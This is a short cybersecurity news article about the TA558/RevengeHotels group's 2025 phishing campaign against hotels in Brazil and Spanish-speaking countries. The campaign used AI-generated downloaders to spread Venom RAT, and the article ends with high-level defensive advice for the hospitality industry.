In 2025, the TA558 group, associated with the RevengeHotels cluster, launched a new series of cyberattacks on the hotel industry in Brazil and Spanish-speaking countries. Using AI-generated scripts, hackers spread the Venom RAT to steal data and bypass security systems.
According to Kaspersky analytics, the attacks are carried out through phishing emails with the subject lines of accounts and reservations. JavaScript and PowerShell downloaders receive files from remote servers, among which the main malicious code is the Venom RAT. This tool, built on the Quasar RAT, costs $650 for a “lifetime license” and is offered in packages with HVNC and Stealer components.
Venom RAT is equipped with a wide range of capabilities: from data collection and use of the infected computer as a proxy to anti-kill protection that removes access rights, terminates analyst processes and blocks Microsoft Defender. In addition, it spreads via USB drives, modifies the Windows registry and is able to install itself as a critical system process to maintain work even after attempts to terminate it.
The RevengeHotels group has been active since at least 2015, attacking tourism and hotel organizations in Latin America. Previously, attackers used infected Word, Excel and PDF documents, exploiting vulnerabilities such as CVE-2017-0199. Their arsenal included Revenge RAT, NjRAT, NanoCoreRAT, Agent Tesla, AsyncRAT, LokiBot, Remcos RAT and others. The main goal of the attacks remains the same – stealing bank card details of hotel and travel service customers, including Booking.com.
TA558 attacks demonstrate that cybercriminals are actively integrating artificial intelligence into their operations, automating the creation of scripts and phishing baits. For the hotel and tourism industry, this is a signal of the need to strengthen multi-layered protection, including email filters, behavioral analytics and monitoring of anomalous activity on hosts.
